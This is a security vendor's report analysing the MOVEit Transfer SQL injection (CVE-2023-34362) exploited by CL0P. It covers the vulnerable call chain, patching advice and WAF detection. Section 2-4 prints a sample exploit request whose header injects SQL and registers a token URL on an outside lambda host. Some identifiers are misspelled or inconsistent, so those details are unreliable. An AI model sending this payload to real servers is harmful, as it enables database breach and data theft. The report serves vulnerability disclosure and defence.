Vulnerability report written by the TA team by analyzing "MOVEit Transfer SQL Injection(CVE-2023-34362)"
This vulnerability is an attack exploited by the CL0P ransomware group, causing significant damage. Malicious users took advantage of the vulnerability to leak data and request money for stolen files.
This vulnerability could allow an unauthenticated attacker to access and manipulate a company's database through a method called SQL injection, resulting in a serious data breach, loss of sensitive information, and serious service interruption. Additionally, the accessibility and diversity of the attack is excellent, so additional attacks may occur in addition to the attack.
This vulnerability can be addressed by updating to 13.0.7, 14.0.5, 14.1.6, 15.0.2 and the latest version, and is normally detected by MOVEit pattern detection in our AIWAF product.
1. Overview
CVE-2023-34362 is a SQL Injection attack in the MOVEit Transfer web application that recently became an issue. This vulnerability has been used by the CL0P ransomware group and has become a major issue.
2. Attack Process
2-1. Invocation
The path to the vulnerable functionality is through an unauthenticated call to GeustAccess.aspx in the UserGetUsersWithEmailAddress() function, and the complete call chain for the related call is shown below.
2-2. Session
While we won't go into a deep analysis of the call chain and all the variable settings needed to reach the vulnerable functionality, the key to what changed with access to manipulating session variables is in SILGuestAccess.aspx, the beginning of GeustAccess.
The main function call is this.m_pkginfo.LoadFromSession(), which sets variables in the session variables that can be affected.
Description: LoadFromSession() loads variables from the session.
Source: https://www.horizon3.ai/attack-research/attack-blogs/moveit-transfer-cve-2023-34362
2-3. Query
To trigger the SQL injection, first put the payload in the MyPkgSelfProvisionDips environment variable via the path movitisapi.dll?action=m2 > SILMachine2(machine2.aspx) > SetAllSessionVarsFromHeaders() and then copy it to SelfProvisionDips via GuestAccess.aspx.
The SelfProvisionedRecips value is then parsed into a comma-separated list of email addresses, passed to UserGetUsersWithEmailAddress() parsed and undeleted, and then inserted into a SQL query consisting of AND Email='...' values to execute the random query.
SELECT Username, Permissions, LoginName, Email FROM users WHERE InstID=9389 AND Deleted=0 AND (Email='<EmailAddress>' OR Email LIKE (%EscapeLikeForSQL(<EmailAddress>)) or Email LIKE (EscapeLikeForSQL(<EmailAddress>));
2-4. Attack Syntax
When the above prerequisites are met, the attack syntax is generated and a request is sent to the vulnerable server.
ex)
POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.28.2
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
xx-silock-transaction: folder_add_by_path
X-siLock-Transaction: session_setvars
X-siLock-SessVar0: MyPkgID: 0
X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO `userexternaltokens` (`TokenId`) VALUES ('exchange__https://kd5cvqi7mbey62lcxiypj2lxxu0kofsk.lambda-url.us-east-2.on.aws/'); -- asdf
Content-Length: 0
3. Response
There are two ways to respond to MOVEit Transfer SQL Injection (CVE-2023-34362) in general.
* Disable all HTTP/HTTPS traffic to your MOVEit Transfer environment.
* Patch to the latest version of MOVEit Transfer
Our AIWAF product is detecting attack syntax that exploits this vulnerability with the pattern "MOVEit Privilege Escalation Vulnerability".
4. Conclusion
The MOVEit incident, led by the CL0P ransomware group, has dominated cybersecurity news for some time, with more than 1,000 organizations affected. This number is expected to continue to grow, making it one of the most powerful software supply chain attacks since SolarWinds in 2021.
Vulnerabilities related to MOVEit products are high-impact vulnerabilities proportional to their accessibility and diversity, requiring a rapid response to mitigate their impact, and therefore require regular checks and updates.
Our AIWAF product has developed a number of patterns to respond to MOVEit product-related vulnerabilities, and we will continue to respond quickly to MOVEit product-related vulnerabilities as they are discovered.
5. References
- https://www.hackthebox.com/blog/cve-2023-34362-explained#vulnerability_description
- https://ko.securecodewarrior.com/article/deep-dive-up-close-and-personal-with-the-moveit-zero-day-vulnerability
- https://www.akamai.com/ko/blog/security-research/moveit-sqli-zero-day-exploit-clop-ransomware
- https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023